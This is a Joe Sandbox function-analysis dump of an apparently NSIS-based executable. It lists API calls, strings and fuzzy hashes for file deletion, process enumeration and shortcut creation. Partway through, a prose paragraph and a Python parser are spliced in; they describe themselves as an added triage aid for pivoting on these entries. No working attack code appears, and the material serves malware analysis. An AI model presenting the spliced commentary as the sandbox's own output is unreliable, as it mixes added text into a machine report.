                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                      • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                      • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                      • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 973152223-0
                                                                                                      • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                      • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                      • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                      • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                      • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                      • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                      • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                      • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                      • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                      • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                      • String ID: $ @$M$N
                                                                                                      • API String ID: 1638840714-3479655940
                                                                                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
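Every function entry in this part of the report has the same line shapes: an "APIs" list of `Name.MODULE(args), ref: ADDR` lines (some marked "Part of subcall function ADDR:", meaning the call is made by a callee rather than by this function), an optional "Strings" list of `text, xrefs: ADDR` lines, and "Key: value" metadata under "Memory Dump Source" and "Similarity" (Opcode ID, Instruction Fuzzy Hash, API ID). The Python below is an added triage aid, not part of the Joe Sandbox report or its tooling: it parses entries of that shape so that direct calls can be separated from subcall attributions, behaviour can be pivoted on (for example, every function that both enumerates and deletes files), and the similarity identifiers can be pulled out for a cross-report search. The sample input is constructed from three entries in this section, abridged to the line kinds the parser needs; the final entry deliberately has no Similarity block, mirroring the truncated DeleteFileW entry further down, so the code also shows how missing identifiers are reported.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample: three function entries abridged from this report section
# (CreateDirectoryW, SetFilePointer, and the DeleteFileW entry as far as the page
# shows it). Repeated "Associated:" lines were dropped; no values were invented.
SAMPLE_REPORT = r"""
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,-00000002,00403A37), ref: 00403819
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
• Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
Similarity
• Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
APIs
• DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
• lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
• FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
• FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
• FindClose.KERNEL32(?), ref: 00406E5F
Strings
• Delete: DeleteFile("%s"), xrefs: 00406DE8
• RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
• \*.*, xrefs: 00406D2F
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                    # call-site address inside the dumped image
    subcall_of: Optional[str]   # callee address when the report attributes the call to a subcall

@dataclass
class StringRef:
    text: str
    xref: str

@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[StringRef] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)   # Opcode ID, fuzzy hashes, source file, ...

# The three line shapes: "Name.MODULE(args), ref: ADDR", "text, xrefs: ADDR", "Key: value".
API_LINE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
                      r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
STRING_LINE = re.compile(r"^•\s*(?P<text>.*),\s*xrefs:\s*(?P<xref>[0-9A-Fa-f]{8})$")
META_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

def parse_report(text: str) -> List[FunctionEntry]:
    """Split the per-function text into entries; a new entry starts at every 'APIs' header."""
    entries: List[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()            # the report is heavily indented
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                entries.append(FunctionEntry())
            section = line
            continue
        if not entries:
            continue                  # stray text before the first entry
        cur = entries[-1]
        if section == "APIs" and (m := API_LINE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["mod"], m["args"].split(","), m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_LINE.match(line)):
            cur.strings.append(StringRef(m["text"], m["xref"]))
        elif m := META_LINE.match(line):  # repeated keys (e.g. Associated) keep the last value
            cur.meta[m["key"]] = m["val"].strip()
    return entries

def direct_apis(entry: FunctionEntry) -> List[str]:
    """Calls the function makes itself; 'Part of subcall function' lines belong to a callee."""
    return [f"{c.name}.{c.module}" for c in entry.apis if c.subcall_of is None]

def entries_calling(entries: List[FunctionEntry], wanted: Set[str],
                    include_subcalls: bool = False) -> List[FunctionEntry]:
    """Behavioural pivot: entries whose API names cover every name in `wanted`."""
    hits = []
    for e in entries:
        names = {c.name for c in e.apis if include_subcalls or c.subcall_of is None}
        if wanted <= names:
            hits.append(e)
    return hits

def pivot_keys(entry: FunctionEntry) -> Dict[str, Optional[str]]:
    """Similarity identifiers to carry into a cross-report search; None where the entry lacks them."""
    return {k: entry.meta.get(k) for k in ("Opcode ID", "Instruction Fuzzy Hash", "API ID")}
```

Feed it the whole "Execution Graph"/function-analysis text of a report rather than the abridged sample and `entries_calling(entries, {"FindFirstFileW", "DeleteFileW"})` returns the functions with an enumerate-and-delete loop; `pivot_keys` on each hit gives the identifiers the report itself files under "Similarity". Treat `include_subcalls=True` results with care: a match there means a callee, not the listed function, makes the call.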
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                      Strings
                                                                                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                      • ptF, xrefs: 00406D1A
                                                                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                      • \*.*, xrefs: 00406D2F
                                                                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                      • API String ID: 2035342205-1650287579
                                                                                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                      Similarity
                                                                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                      • String ID: F$A
                                                                                                      • API String ID: 3347642858-1281894373
                                                                                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      Similarity
                                                                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                      • API String ID: 1916479912-1189179171
                                                                                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
                                                                                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406A73
                                                                                                      Similarity
                                                                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                      • API String ID: 3581403547-1792361021
                                                                                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                      Strings
                                                                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstance
                                                                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                      • API String ID: 542301482-1377821865
                                                                                                      • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                      • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                      • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                      • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                      Similarity
                                                                                                      • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                      • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                      • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                      • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                      • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                      • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                      • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                      • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                        • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
